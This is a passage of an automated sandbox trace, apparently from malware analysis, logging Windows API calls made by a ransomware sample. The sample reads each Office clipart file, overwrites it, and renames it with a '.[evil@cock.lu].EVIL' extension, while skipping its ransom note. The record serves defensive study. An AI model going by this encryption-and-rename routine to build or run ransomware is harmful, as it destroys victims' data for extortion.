lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x28ae, lpOverlapped=0x0) returned 1 [0160.075] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.075] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.075] _errno () returned 0x84b1160840 [0160.075] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.075] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x28c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x28c0, lpOverlapped=0x0) returned 1 [0160.075] CloseHandle (hObject=0x1a8) returned 1 [0160.075] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.075] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.076] __uncaught_exception () returned 0x84b1160800 [0160.076] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.076] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01473_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01473_.wmf.[evil@cock.lu].evil")) returned 1 [0160.077] ??_V@YAXPEAX@Z () returned 0x1 [0160.080] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF", dwFileAttributes=0x200) returned 0 [0160.081] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.081] wcsstr (_Str="NA01474_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.081] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF") returned 69 [0160.081] wcscmp (_String1="NA01474_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.081] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01474_.WMF") returned 0x0 [0160.081] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF") returned 0x45 [0160.081] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01474_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.083] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x349c, lpOverlapped=0x0) returned 1 [0160.091] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.091] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.091] _errno () returned 0x84b1160840 [0160.091] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.091] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x34a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x34a0, lpOverlapped=0x0) returned 1 [0160.091] CloseHandle (hObject=0x1a8) returned 1 [0160.092] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.092] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.092] __uncaught_exception () returned 0x84b1160800 [0160.092] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.092] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01474_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01474_.wmf.[evil@cock.lu].evil")) returned 1 [0160.093] ??_V@YAXPEAX@Z () returned 0x1 [0160.096] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF", dwFileAttributes=0x200) returned 0 [0160.097] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.097] wcsstr (_Str="NA01627_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.097] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF") returned 69 [0160.097] wcscmp (_String1="NA01627_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.097] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01627_.WMF") returned 0x0 [0160.097] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF") returned 0x45 [0160.097] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01627_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.099] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xce0, lpOverlapped=0x0) returned 1 [0160.121] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.121] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.121] _errno () returned 0x84b1160840 [0160.121] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.121] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd00, lpOverlapped=0x0) returned 1 [0160.121] CloseHandle (hObject=0x1a8) returned 1 [0160.121] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.121] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.121] __uncaught_exception () returned 0x84b1160800 [0160.121] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.122] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01627_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01627_.wmf.[evil@cock.lu].evil")) returned 1 [0160.123] ??_V@YAXPEAX@Z () returned 0x1 [0160.127] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF", dwFileAttributes=0x200) returned 0 [0160.127] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.127] wcsstr (_Str="NA01680_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 69 [0160.127] wcscmp (_String1="NA01680_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01680_.WMF") returned 0x0 [0160.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 0x45 [0160.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01680_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.131] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb9e, lpOverlapped=0x0) returned 1 [0160.142] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.142] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.142] _errno () returned 0x84b1160840 [0160.142] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.143] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xba0, lpOverlapped=0x0) returned 1 [0160.143] CloseHandle (hObject=0x1a8) returned 1 [0160.143] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.143] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.143] __uncaught_exception () returned 0x84b1160800 [0160.143] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.144] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01680_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01680_.wmf.[evil@cock.lu].evil")) returned 1 [0160.145] ??_V@YAXPEAX@Z () returned 0x1 [0160.149] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF", dwFileAttributes=0x200) returned 0 [0160.150] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.150] wcsstr (_Str="NA01682_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.150] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 69 [0160.150] wcscmp (_String1="NA01682_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.150] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01682_.WMF") returned 0x0 [0160.150] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 0x45 [0160.150] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.152] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc88, lpOverlapped=0x0) returned 1 [0160.176] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.176] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.176] _errno () returned 0x84b1160840 [0160.176] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.176] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xca0, lpOverlapped=0x0) returned 1 [0160.177] CloseHandle (hObject=0x1a8) returned 1 [0160.177] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.177] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.177] __uncaught_exception () returned 0x84b1160800 [0160.177] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.177] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf.[evil@cock.lu].evil")) returned 1 [0160.179] ??_V@YAXPEAX@Z () returned 0x1 [0160.182] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF", dwFileAttributes=0x200) returned 0 [0160.183] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.183] wcsstr (_Str="NA01701_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.183] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 69 [0160.183] wcscmp (_String1="NA01701_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.183] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01701_.WMF") returned 0x0 [0160.183] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 0x45 [0160.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.186] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14c4, lpOverlapped=0x0) returned 1 [0160.196] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.196] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.196] _errno () returned 0x84b1160840 [0160.196] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.196] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14e0, lpOverlapped=0x0) returned 1 [0160.196] CloseHandle (hObject=0x1a8) returned 1 [0160.196] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.197] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.197] __uncaught_exception () returned 0x84b1160800 [0160.197] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.197] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf.[evil@cock.lu].evil")) returned 1 [0160.198] ??_V@YAXPEAX@Z () returned 0x1 [0160.202] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF", dwFileAttributes=0x200) returned 0 [0160.202] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.202] wcsstr (_Str="NA01848_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.202] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 69 [0160.202] wcscmp (_String1="NA01848_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.202] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01848_.WMF") returned 0x0 [0160.202] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 0x45 [0160.202] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.205] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x460, lpOverlapped=0x0) returned 1 [0160.215] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.215] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.215] _errno () returned 0x84b1160840 [0160.215] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.215] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x480, lpOverlapped=0x0) returned 1 [0160.215] CloseHandle (hObject=0x1a8) returned 1 [0160.215] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.216] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.216] __uncaught_exception () returned 0x84b1160800 [0160.216] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.216] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf.[evil@cock.lu].evil")) returned 1 [0160.217] ??_V@YAXPEAX@Z () returned 0x1 [0160.221] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF", dwFileAttributes=0x200) returned 0 [0160.221] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.221] wcsstr (_Str="NA01849_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.221] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF") returned 69 [0160.221] wcscmp (_String1="NA01849_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.221] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01849_.WMF") returned 0x0 [0160.221] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF") returned 0x45 [0160.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01849_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.224] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x270, lpOverlapped=0x0) returned 1 [0160.233] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.233] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.233] _errno () returned 0x84b1160840 [0160.233] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.234] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x280, lpOverlapped=0x0) returned 1 [0160.234] CloseHandle (hObject=0x1a8) returned 1 [0160.234] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.234] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.234] __uncaught_exception () returned 0x84b1160800 [0160.234] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.313] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01849_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01849_.wmf.[evil@cock.lu].evil")) returned 1 [0160.314] ??_V@YAXPEAX@Z () returned 0x1 [0160.318] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF", dwFileAttributes=0x200) returned 0 [0160.318] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.318] wcsstr (_Str="NA01852_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.318] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF") returned 69 [0160.318] wcscmp (_String1="NA01852_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.318] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01852_.WMF") returned 0x0 [0160.318] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF") returned 0x45 [0160.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01852_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.322] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1138, lpOverlapped=0x0) returned 1 [0160.331] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.331] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.331] _errno () returned 0x84b1160840 [0160.331] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.331] 